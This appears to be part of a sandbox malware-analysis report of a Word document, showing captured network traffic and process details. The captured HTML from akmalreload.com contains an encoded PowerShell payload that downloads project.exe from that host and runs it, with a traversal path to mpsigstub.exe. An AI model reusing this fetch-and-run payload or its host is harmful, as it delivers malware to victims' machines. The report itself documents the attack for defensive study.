      2022-07-21 12:27:37 UTC13INData Raw: 31 63 36 62 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 3e 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f
      Data Ascii: 1c6b<!doctype html><html lang="en"><body><script>//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLO
      2022-07-21 12:27:37 UTC13INData Raw: 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e
      Data Ascii: FKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHN
      2022-07-21 12:27:37 UTC14INData Raw: 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46
      Data Ascii: JSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNF
      2022-07-21 12:27:37 UTC16INData Raw: 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53
      Data Ascii: -98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBS
      2022-07-21 12:27:37 UTC17INData Raw: 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46
      Data Ascii: 3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADF
      2022-07-21 12:27:37 UTC18INData Raw: 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32 48 4e 52 54 46 4c 2e 4b 44 4a 53 4e 46 50 30 34 33 38 39 59 48 52 35 3b 33 4f 51 34 49 52 54 46 55 44 53 4c 4f 46 4b 4a 56 42 53 41 0a 2f 2f 7a 78 63 77 61 6c 73 64 6b 68 66 6e 20 73 61 64 6e 68 3b 4b 4a 53 48 41 44 46 47 4e 20 38 32 34 39 52 35 54 59 48 4e 4b 3b 4c 53 44 4a 46 41 48 56 4e 2d 39 38 34 33 32
      Data Ascii: dkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432HNRTFL.KDJSNFP04389YHR5;3OQ4IRTFUDSLOFKJVBSA//zxcwalsdkhfn sadnh;KJSHADFGN 8249R5TYHNK;LSDJFAHVN-98432
      2022-07-21 12:27:37 UTC20INData Raw: 4f 69 38 76 59 57 74 74 59 57 78 79 5a 57 78 76 59 57 51 75 59 32 39 74 4c 33 4e 30 63 6e 56 72 4c 33 42 79 62 32 70 6c 59 33 51 75 5a 58 68 6c 49 69 77 69 51 7a 70 63 64 47 56 74 63 46 78 77 63 6d 39 71 5a 57 4e 30 4c 6d 56 34 5a 53 49 70 43 6c 4e 30 59 58 4a 30 4c 56 42 79 62 32 4e 6c 63 33 4d 67 4b 43 4a 44 4f 6c 78 30 5a 57 31 77 58 48 42 79 62 32 70 6c 59 33 51 75 5a 58 68 6c 49 69 6b 3d 27 2b 5b 63 68 61 72 5d 33 34 2b 27 29 29 27 29 29 29 29 69 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 2e 2e 2f 57 69 6e 64 6f 77 73 2f 53 79 73 74 65 6d 33 32 2f 6d 70 73 69 67 73 74 75 62 2e 65 78 65 20 49 54 5f 41 75 74 6f 54 72 6f 75 62 6c 65 73 68 6f 6f 74 3d 74 73 5f 41 55 54 4f 5c 22
      Data Ascii: Oi8vYWttYWxyZWxvYWQuY29tL3N0cnVrL3Byb2plY3QuZXhlIiwiQzpcdGVtcFxwcm9qZWN0LmV4ZSIpClN0YXJ0LVByb2Nlc3MgKCJDOlx0ZW1wXHByb2plY3QuZXhlIik='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"
      2022-07-21 12:27:37 UTC20INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      9192.168.2.2249180104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:38 UTC20OUTHEAD /struk/wellcome.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: akmalreload.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-07-21 12:27:38 UTC20INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:38 GMT
      Content-Type: text/html; charset=utf-8
      Connection: close
      vary: Accept-Encoding
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: 9701af36bd3993b7fa708f0614537611
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:37 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YWCfjbm%2B2wOQomgGfmOazDMeGrf9TYePTWc%2Br9qVnEfqV8qjn%2Fl2a0A%2BiS%2Fpr8C44pyty8scxZchcU0wVvw59Im%2FYhsI%2Fdq9xElcG3jCZ2ob9B9bSDX%2BEEZe3rfwlYlYTjE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee8b2d5471a5-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      System Behavior

      General

      Target ID:0
      Start time:14:26:19
      Start date:21/07/2022
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f1c0000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      No disassembly